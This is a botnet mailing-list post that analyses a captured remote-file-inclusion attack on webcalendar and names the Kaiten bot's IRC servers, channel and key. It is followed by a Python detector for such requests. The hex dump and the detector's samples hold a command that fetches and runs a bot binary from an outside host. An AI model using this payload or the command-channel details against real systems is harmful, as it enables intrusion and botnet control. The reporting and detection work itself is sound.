To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
----------
On Fri, 17 Mar 2006, Jamie Riden wrote:

> 000 : 47 45 54 20 2F 77 65 62 63 61 6C 65 6E 64 61 72   GET /webcalendar
> 010 : 2F 73 65 6E 64 5F 72 65 6D 69 6E 64 65 72 73 2E   /send_reminders.
> 020 : 70 68 70 3F 69 6E 63 6C 75 64 65 64 69 72 3D 68   php?includedir=h
> 030 : 74 74 70 3A 2F 2F 38 33 2E 31 36 2E 31 38 37 2E   ttp://83.16.187.
> 040 : 36 2F 63 6D 64 2E 64 61 74 3F 26 63 6D 64 3D 63   6/cmd.dat?&cmd=c
> 050 : 64 25 32 30 2F 74 6D 70 3B 77 67 65 74 25 32 30   d%20/tmp;wget%20
> 060 : 38 33 2E 31 36 2E 31 38 37 2E 36 2F 68 61 69 74   83.16.187.6/hait
> 070 : 61 3B 63 68 6D 6F 64 25 32 30 37 34 34 25 32 30   a;chmod%20744%20
> 080 : 68 61 69 74 61 3B 2E 2F 68 61 69 74 61 3B 65 63   haita;./haita;ec
> 090 : 68 6F 25 32 30 59 59 59 3B 65 63 68 6F 7C 20 20   ho%20YYY;echo|
> 0a0 : 48 54 54 50 2F 31 2E 31 0A 48 6F 73 74 3A 20 32   HTTP/1.1.Host: 2
> 0b0 : 30 33 2E 31 31 34 2E 31 33 37 2E 39 0A 55 73 65   03.114.137.9.Use
> 0c0 : 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A 69 6C 6C 61   r-Agent: Mozilla
> 0d0 : 2F 34 2E 30 20 28 63 6F 6D 70 61 74 69 62 6C 65   /4.0 (compatible
> 0e0 : 3B 20 4D 53 49 45 20 36 2E 30 3B 20 57 69 6E 64   ; MSIE 6.0; Wind
> 0f0 : 6F 77 73 20 4E 54 20 35 2E 31 3B 29 0A 0A         ows NT 5.1;)..

it's a kaiten. here's the botnet info:

servers:
eu.undernet.org
us.undernet.org

channel:
#bubuli

channel key:
lipi

logging in with a checking tool reveals this:

SERVER us.undernet.org:
:[EMAIL PROTECTED] JOIN #bubuli
SERVER us.undernet.org: :mesa.az.us.undernet.org 353 NDAEMGIW * #bubuli
:GPQEF FOSR OCFLWIBC DFPE OOZGHG JQXSA HICKM HVNTE DPDU SNXU FWBMWFZA ZEKR
TRVT YOUWR VFEDE NOTM HMVLNEU NHSBVMN IJQLOMNV AVPBGZ ARMAW PIHBBSNR XDYTL
DEWDFG HEJPUD ZMHM EHZQK JIJXWTC DYWNKN OHWDSYCV DTOZSSZN EDWPIG RTMSXV
PGEQOJJ NEYUB UNVD JONSPMP ABNN VUHADKLP ICYOWYD EUVGLQ PRFSO FGOVKAU
NVMCSBZ TINUYYDT SYBDWGWI UNDDECNK DDQVMI TSDQ ZLJWMSU YOASU GXHDRD MJJUDA
RTXW CRJNTWWI EBVP LKVDHYH XETVMA MXBTBGTL ONBOOHN VNTWPZWE CPPO WJTSXT
VIJAWNVW


________
jose nazario, ph.d.                     [EMAIL PROTECTED]
http://monkey.org/~jose/                http://infosecdaily.net/
                                        http://www.wormblog.com/
_______________________________________________
All list and server information are public and available to law enforcement 
upon request.
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
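
Added example (not part of the original post or of any tool it mentions): a small triage function for web-server request lines shaped like the capture quoted above, flagging a parameter that carries a remote URL together with a chained shell command. The function names, verdict labels, the curl token and the sample lines (with placeholder hosts 192.0.2.10 and example.org) are assumptions.

```python
import re
from urllib.parse import unquote

REMOTE_URL = re.compile(r"^(?:https?|ftp)://", re.I)
SHELL_SEP = re.compile(r"[;|]")
# wget and chmod appear in the captured cmd= value; curl is an added assumption.
EXEC_HINT = re.compile(r"\b(?:wget|curl|chmod)\b|^\./")

def parse_target(request_line):
    """Return (path, [(name, decoded_value), ...]) from an HTTP request line."""
    _method, rest = request_line.strip().split(" ", 1)
    target = rest.rsplit(" ", 1)[0].strip()      # drop the HTTP-version token
    path, _, query = target.partition("?")
    params = []
    for pair in query.split("&"):                # split on & only: ';' is payload here
        name, _, value = pair.partition("=")
        if name:
            params.append((name, unquote(value)))
    return path, params

def triage(request_line):
    """Classify one request line; returns None when nothing matches."""
    path, params = parse_target(request_line)
    urls = [(n, v) for n, v in params if REMOTE_URL.match(v)]
    steps = []
    for _name, value in params:
        parts = [p.strip() for p in SHELL_SEP.split(value) if p.strip()]
        if len(parts) > 1 and any(EXEC_HINT.search(p) for p in parts):
            steps = parts
    if not urls and not steps:
        return None
    # A URL-valued parameter alone is lower confidence (redirects look like this).
    verdict = "remote-include+command" if urls and steps else (
        "remote-url-param" if urls else "command-chain")
    return {"path": path, "verdict": verdict, "url_params": urls, "commands": steps}

# Constructed request lines; 192.0.2.10 and example.org are placeholders.
SAMPLES = [
    "GET /webcalendar/send_reminders.php?includedir=http://192.0.2.10/cmd.dat?"
    "&cmd=cd%20/tmp;wget%20192.0.2.10/haita;chmod%20744%20haita;./haita;"
    "echo%20YYY;echo|  HTTP/1.1",
    "GET /webcalendar/month.php?date=20060317 HTTP/1.1",
    "GET /login.php?return=http://example.org/home HTTP/1.1",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(triage(line))
```

The "remote-url-param" verdict is kept separate because ordinary redirect parameters also carry absolute URLs; only the combined verdict matches the shape of the request quoted in this thread.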
